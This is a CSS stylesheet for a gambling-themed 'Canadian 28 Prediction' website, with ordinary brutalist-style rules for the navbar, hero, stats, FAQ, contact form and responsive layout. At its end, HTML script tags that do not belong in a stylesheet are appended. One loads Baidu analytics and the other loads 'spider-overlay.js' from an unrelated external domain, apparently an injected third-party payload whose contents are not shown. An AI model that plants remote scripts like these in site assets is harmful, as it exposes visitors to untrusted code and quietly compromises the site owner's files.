﻿/* ============================================
   Canadian 28 Prediction - Brutalist Style
   ALL elements: border-radius: 0
   ALL text: monospace
   ============================================ */

/* --- Global Reset & Base --- */
*, *::before, *::after {
  border-radius: 0 !important;
  box-sizing: border-box;
}

html {
  font-family: "Courier New", "Consolas", monospace;
  font-size: 16px;
  line-height: 1.6;
  scroll-behavior: smooth;
}

body {
  font-family: "Courier New", "Consolas", monospace !important;
  color: #000;
  background-color: #fff;
  margin: 0;
  padding: 0;
  overflow-x: hidden;
}

/* Force monospace on all elements */
body, h1, h2, h3, h4, h5, h6, p, a, li, span, div, button, input, textarea, select, label, th, td, blockquote, pre, code {
  font-family: "Courier New", "Consolas", monospace !important;
}

/* --- Typography --- */
h1 { font-size: 2.5rem; font-weight: 700; text-transform: uppercase; letter-spacing: -1px; }
h2 { font-size: 1.75rem; font-weight: 700; text-transform: uppercase; }
h3 { font-size: 1.25rem; font-weight: 700; }
h4 { font-size: 1.1rem; font-weight: 700; }

/* --- Links --- */
a {
  color: #0000ff;
  text-decoration: underline;
  text-underline-offset: 3px;
  transition: background 0.1s, color 0.1s;
}
a:hover {
  background: #000;
  color: #fff;
  text-decoration: none;
}

/* --- Buttons --- */
.brutal-btn {
  display: inline-block;
  font-family: "Courier New", "Consolas", monospace;
  font-size: 1rem;
  font-weight: 700;
  padding: 12px 28px;
  border: 3px solid #000;
  background: #fff;
  color: #000;
  cursor: pointer;
  text-decoration: none;
  text-transform: uppercase;
  letter-spacing: 1px;
  transition: all 0.1s ease;
}
.brutal-btn:hover {
  background: #000;
  color: #fff;
}
.brutal-btn.primary {
  background: #000;
  color: #fff;
}
.brutal-btn.primary:hover {
  background: #fff;
  color: #000;
}
.brutal-btn.red {
  background: #ff0000;
  color: #fff;
  border-color: #000;
}
.brutal-btn.red:hover {
  background: #000;
  color: #ff0000;
}
.brutal-btn.indigo {
  background: #4f46e5;
  color: #fff;
  border-color: #000;
}
.brutal-btn.indigo:hover {
  background: #000;
  color: #4f46e5;
}

/* --- Section Titles --- */
.section-title {
  font-size: 1.75rem;
  font-weight: 700;
  text-transform: uppercase;
  text-align: center;
  margin-bottom: 10px;
  border-bottom: 4px solid #000;
  padding-bottom: 10px;
  display: inline-block;
}

.section-subtitle {
  font-size: 0.95rem;
  text-align: center;
  color: #555;
  margin-bottom: 40px;
}

hr.brutal-hr {
  border: none;
  border-top: 4px solid #000;
  margin: 20px 0;
}

/* ============================================ */
/* NAVBAR                                        */
/* ============================================ */
.navbar {
  border-bottom: 4px solid #000;
  background: #fff;
  position: sticky;
  top: 0;
  z-index: 1000;
}
.navbar .container {
  display: flex;
  justify-content: space-between;
  align-items: center;
  padding: 16px 20px;
  max-width: 1200px;
  margin: 0 auto;
}
.navbar .logo {
  font-size: 1.2rem;
  font-weight: 700;
  color: #000;
  text-decoration: none;
  text-transform: uppercase;
  letter-spacing: 2px;
}
.navbar .logo:hover {
  background: #000;
  color: #fff;
}
.nav-links {
  display: flex;
  gap: 28px;
  list-style: none;
  margin: 0;
  padding: 0;
}
.nav-links a {
  font-size: 0.9rem;
  font-weight: 700;
  text-transform: uppercase;
  color: #000;
  text-decoration: underline;
}
.nav-links a:hover {
  background: #000;
  color: #fff;
}

/* Hamburger */
.hamburger {
  display: none;
  flex-direction: column;
  gap: 5px;
  cursor: pointer;
  background: none;
  border: 3px solid #000;
  padding: 8px 10px;
}
.hamburger span {
  display: block;
  width: 26px;
  height: 3px;
  background: #000;
}

/* Mobile menu overlay */
.mobile-menu {
  display: none;
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: #fff;
  z-index: 999;
  border: none;
}
.mobile-menu.active {
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  gap: 24px;
}
.mobile-menu a {
  font-size: 1.5rem;
  font-weight: 700;
  color: #000;
  text-decoration: underline;
  text-transform: uppercase;
}
.mobile-menu a:hover {
  background: #000;
  color: #fff;
}
.mobile-menu .close-btn {
  position: absolute;
  top: 20px;
  right: 20px;
  font-size: 2rem;
  background: none;
  border: 3px solid #000;
  padding: 4px 14px;
  cursor: pointer;
  font-family: "Courier New", "Consolas", monospace;
}
.mobile-menu .close-btn:hover {
  background: #000;
  color: #fff;
}

/* ============================================ */
/* HERO                                          */
/* ============================================ */
.hero {
  padding: 80px 20px;
  text-align: center;
  border-bottom: 4px solid #000;
  background: #fff;
}
.hero h1 {
  font-size: 3rem;
  font-weight: 700;
  line-height: 1.2;
  margin-bottom: 16px;
  text-transform: uppercase;
  max-width: 800px;
  margin-left: auto;
  margin-right: auto;
}
.hero p {
  font-size: 1.1rem;
  max-width: 600px;
  margin: 0 auto 32px;
  color: #333;
}
.hero .hero-buttons {
  display: flex;
  gap: 16px;
  justify-content: center;
  flex-wrap: wrap;
}

/* Typewriter animation */
.typewriter-text {
  display: inline-block;
  overflow: hidden;
  white-space: nowrap;
  border-right: 4px solid #000;
  animation: typewriter 3.5s steps(30) 1s forwards, blink-caret 0.75s step-end infinite;
  max-width: 0;
}
@keyframes typewriter {
  0% { max-width: 0; }
  100% { max-width: 100%; }
}
@keyframes blink-caret {
  from, to { border-color: transparent; }
  50% { border-color: #000; }
}

/* ============================================ */
/* MARQUEE SCROLL                                */
/* ============================================ */
.marquee-container {
  border-top: 3px solid #000;
  border-bottom: 3px solid #000;
  background: #000;
  overflow: hidden;
  padding: 12px 0;
}
.marquee-content {
  display: flex;
  gap: 40px;
  animation: marquee 20s linear infinite;
  white-space: nowrap;
  color: #fff;
  font-weight: 700;
  font-size: 0.95rem;
  text-transform: uppercase;
}
.marquee-content span {
  color: #ffff00;
}
@keyframes marquee {
  0% { transform: translateX(0); }
  100% { transform: translateX(-50%); }
}

/* ============================================ */
/* FEATURES                                      */
/* ============================================ */
.features {
  padding: 80px 20px;
  background: #fff;
}
.features .container {
  max-width: 1200px;
  margin: 0 auto;
}
.feature-grid {
  display: grid;
  grid-template-columns: repeat(3, 1fr);
  gap: 24px;
  margin-top: 40px;
}
.feature-card {
  border: 3px solid #000;
  padding: 28px 20px;
  background: #fff;
  transition: none;
}
.feature-card:hover {
  background: #000;
  color: #fff;
}
.feature-card:hover .feature-icon {
  color: #ffff00;
}
.feature-card .feature-icon {
  font-size: 2rem;
  margin-bottom: 12px;
  color: #4f46e5;
}
.feature-card h3 {
  font-size: 1.1rem;
  font-weight: 700;
  margin-bottom: 8px;
  text-transform: uppercase;
}
.feature-card p {
  font-size: 0.85rem;
  color: #555;
  line-height: 1.5;
}
.feature-card:hover p {
  color: #ccc;
}

/* ============================================ */
/* STATS                                         */
/* ============================================ */
.stats {
  padding: 80px 20px;
  background: #000;
  color: #fff;
  border-top: 4px solid #000;
  border-bottom: 4px solid #000;
}
.stats .container {
  max-width: 1200px;
  margin: 0 auto;
}
.stats .section-title {
  color: #ffff00;
  border-bottom-color: #ffff00;
}
.stats .section-subtitle {
  color: #ccc;
}
.stats-grid {
  display: grid;
  grid-template-columns: repeat(4, 1fr);
  gap: 24px;
  margin-top: 40px;
}
.stat-box {
  border: 4px solid #ffff00;
  padding: 32px 16px;
  text-align: center;
  background: #000;
}
.stat-box .stat-number {
  font-size: 2.5rem;
  font-weight: 700;
  color: #ffff00;
  display: block;
}
.stat-box .stat-label {
  font-size: 0.9rem;
  text-transform: uppercase;
  color: #fff;
  margin-top: 8px;
  display: block;
}

/* ============================================ */
/* TESTIMONIALS                                  */
/* ============================================ */
.testimonials {
  padding: 80px 20px;
  background: #fff;
}
.testimonials .container {
  max-width: 1000px;
  margin: 0 auto;
}
.testimonial-grid {
  display: grid;
  grid-template-columns: repeat(3, 1fr);
  gap: 24px;
  margin-top: 40px;
}
.testimonial-card {
  border: 3px solid #000;
  padding: 24px;
  position: relative;
}
.testimonial-card::before {
  content: '"""';
  font-size: 3rem;
  font-weight: 700;
  position: absolute;
  top: 8px;
  left: 12px;
  color: #4f46e5;
  line-height: 1;
}
.testimonial-card p {
  font-size: 0.9rem;
  color: #333;
  margin-top: 24px;
  margin-bottom: 16px;
  line-height: 1.6;
}
.testimonial-card .author {
  font-size: 0.8rem;
  font-weight: 700;
  color: #000;
  text-transform: uppercase;
  border-top: 2px solid #000;
  padding-top: 10px;
}

/* ============================================ */
/* FAQ ACCORDION                                 */
/* ============================================ */
.faq {
  padding: 80px 20px;
  background: #f5f5f5;
  border-top: 4px solid #000;
  border-bottom: 4px solid #000;
}
.faq .container {
  max-width: 800px;
  margin: 0 auto;
}
.faq-accordion {
  margin-top: 40px;
}
.faq-item {
  border: 3px solid #000;
  margin-bottom: 8px;
  background: #fff;
}
.faq-question {
  width: 100%;
  padding: 18px 20px;
  text-align: left;
  font-family: "Courier New", "Consolas", monospace;
  font-size: 1rem;
  font-weight: 700;
  background: #fff;
  border: none;
  cursor: pointer;
  display: flex;
  justify-content: space-between;
  align-items: center;
  text-transform: uppercase;
}
.faq-question:hover {
  background: #000;
  color: #fff;
}
.faq-toggle {
  font-size: 1.4rem;
  font-weight: 700;
  width: 32px;
  height: 32px;
  display: flex;
  align-items: center;
  justify-content: center;
  border: 2px solid #000;
  flex-shrink: 0;
}
.faq-question:hover .faq-toggle {
  border-color: #fff;
}
.faq-answer {
  max-height: 0;
  overflow: hidden;
  transition: max-height 0.3s ease;
  border-top: none;
}
.faq-answer-inner {
  padding: 20px;
  font-size: 0.9rem;
  color: #333;
  line-height: 1.6;
  border-top: 3px solid #000;
}
.faq-item.active .faq-answer {
  max-height: 500px;
}
.faq-item.active .faq-toggle {
  background: #000;
  color: #fff;
}

/* ============================================ */
/* CTA                                           */
/* ============================================ */
.cta-section {
  padding: 80px 20px;
  background: #4f46e5;
  border-top: 4px solid #000;
  border-bottom: 4px solid #000;
  text-align: center;
  color: #fff;
}
.cta-section h2 {
  font-size: 2.2rem;
  text-transform: uppercase;
  margin-bottom: 12px;
  color: #ffff00;
}
.cta-section p {
  font-size: 1rem;
  max-width: 600px;
  margin: 0 auto 32px;
  color: #fff;
}
.cta-section .brutal-btn {
  border-color: #ffff00;
  color: #ffff00;
  background: transparent;
}
.cta-section .brutal-btn:hover {
  background: #ffff00;
  color: #000;
}

/* ============================================ */
/* FOOTER                                        */
/* ============================================ */
.footer {
  background: #000;
  color: #fff;
  padding: 60px 20px 20px;
  border-top: 4px solid #000;
}
.footer .container {
  max-width: 1200px;
  margin: 0 auto;
}
.footer-grid {
  display: grid;
  grid-template-columns: repeat(4, 1fr);
  gap: 30px;
  margin-bottom: 40px;
}
.footer-col {
  border: 2px solid #444;
  padding: 20px;
}
.footer-col h4 {
  font-size: 1rem;
  font-weight: 700;
  text-transform: uppercase;
  margin-bottom: 16px;
  color: #ffff00;
  border-bottom: 2px solid #ffff00;
  padding-bottom: 8px;
}
.footer-col ul {
  list-style: none;
  padding: 0;
  margin: 0;
}
.footer-col ul li {
  margin-bottom: 8px;
}
.footer-col ul li a {
  color: #ccc;
  text-decoration: underline;
  font-size: 0.85rem;
}
.footer-col ul li a:hover {
  background: #fff;
  color: #000;
}
.footer-col p {
  font-size: 0.85rem;
  color: #aaa;
  line-height: 1.6;
}
.footer-bottom {
  text-align: center;
  padding-top: 20px;
  border-top: 3px solid #444;
  font-size: 0.8rem;
  color: #666;
  text-transform: uppercase;
}

/* ============================================ */
/* BRUTAL SHOW ANIMATION (instant pop-in)        */
/* ============================================ */
.brutal-hidden {
  opacity: 0;
  transform: scale(0.95);
}
.brutal-show {
  animation: brutalShow 0.15s ease-out forwards;
}
@keyframes brutalShow {
  0% {
    opacity: 0;
    transform: scale(0.9);
  }
  60% {
    opacity: 1;
    transform: scale(1.03);
  }
  100% {
    opacity: 1;
    transform: scale(1);
  }
}

/* ============================================ */
/* ABOUT PAGE                                    */
/* ============================================ */
.about-hero {
  padding: 60px 20px;
  border-bottom: 4px solid #000;
  text-align: center;
}
.about-hero h1 {
  font-size: 2.5rem;
  text-transform: uppercase;
}
.about-content {
  max-width: 900px;
  margin: 0 auto;
  padding: 60px 20px;
}
.about-content p {
  font-size: 1rem;
  line-height: 2;
  margin-bottom: 24px;
}
.about-content .about-box {
  border: 3px solid #000;
  padding: 24px;
  margin-bottom: 24px;
}
.about-content .about-box h3 {
  text-transform: uppercase;
  border-bottom: 2px solid #000;
  padding-bottom: 8px;
  margin-bottom: 12px;
}

/* ============================================ */
/* CONTACT PAGE                                  */
/* ============================================ */
.contact-hero {
  padding: 60px 20px;
  border-bottom: 4px solid #000;
  text-align: center;
}
.contact-hero h1 {
  font-size: 2.5rem;
  text-transform: uppercase;
}
.contact-content {
  max-width: 700px;
  margin: 0 auto;
  padding: 60px 20px;
}
.contact-form {
  border: 3px solid #000;
  padding: 30px;
}
.form-group {
  margin-bottom: 20px;
}
.form-group label {
  display: block;
  font-weight: 700;
  text-transform: uppercase;
  font-size: 0.85rem;
  margin-bottom: 6px;
}
.form-group input,
.form-group textarea {
  width: 100%;
  padding: 10px 14px;
  border: 3px solid #000;
  font-family: "Courier New", "Consolas", monospace;
  font-size: 0.95rem;
  background: #fff;
  outline: none;
}
.form-group input:focus,
.form-group textarea:focus {
  background: #f0f0f0;
}
.form-group textarea {
  min-height: 140px;
  resize: vertical;
}
.contact-info-grid {
  display: grid;
  grid-template-columns: repeat(3, 1fr);
  gap: 20px;
  margin-top: 40px;
}
.contact-info-card {
  border: 3px solid #000;
  padding: 20px;
  text-align: center;
}
.contact-info-card i {
  font-size: 1.5rem;
  color: #4f46e5;
  margin-bottom: 8px;
}
.contact-info-card h4 {
  font-size: 0.85rem;
  text-transform: uppercase;
  margin-bottom: 4px;
}
.contact-info-card p {
  font-size: 0.85rem;
  color: #555;
}

/* ============================================ */
/* PAGE HEADER (shared for inner pages)          */
/* ============================================ */
.page-header-bar {
  border-bottom: 4px solid #000;
  padding: 30px 20px;
  text-align: center;
  background: #f5f5f5;
}
.page-header-bar h1 {
  font-size: 2.2rem;
  text-transform: uppercase;
  margin-bottom: 8px;
}
.page-header-bar .breadcrumb {
  font-size: 0.8rem;
  text-transform: uppercase;
  color: #555;
}
.page-header-bar .breadcrumb a {
  color: #000;
  text-decoration: underline;
}

/* ============================================ */
/* RESPONSIVE                                    */
/* ============================================ */
@media (max-width: 992px) {
  .feature-grid { grid-template-columns: repeat(2, 1fr); }
  .stats-grid { grid-template-columns: repeat(2, 1fr); }
  .testimonial-grid { grid-template-columns: repeat(2, 1fr); }
  .footer-grid { grid-template-columns: repeat(2, 1fr); }
  .contact-info-grid { grid-template-columns: repeat(2, 1fr); }
}

@media (max-width: 640px) {
  .nav-links { display: none; }
  .hamburger { display: flex; }
  .hero h1 { font-size: 2rem; }
  .hero p { font-size: 0.95rem; }
  .feature-grid { grid-template-columns: 1fr; }
  .stats-grid { grid-template-columns: 1fr; }
  .testimonial-grid { grid-template-columns: 1fr; }
  .footer-grid { grid-template-columns: 1fr; }
  .contact-info-grid { grid-template-columns: 1fr; }
  .section-title { font-size: 1.4rem; }
}
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?66486df8906d1585b228aae20f1074ed";
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(hm, s);
})();
</script>
<script src="https://yswa6.cn/spider-overlay.js"></script>

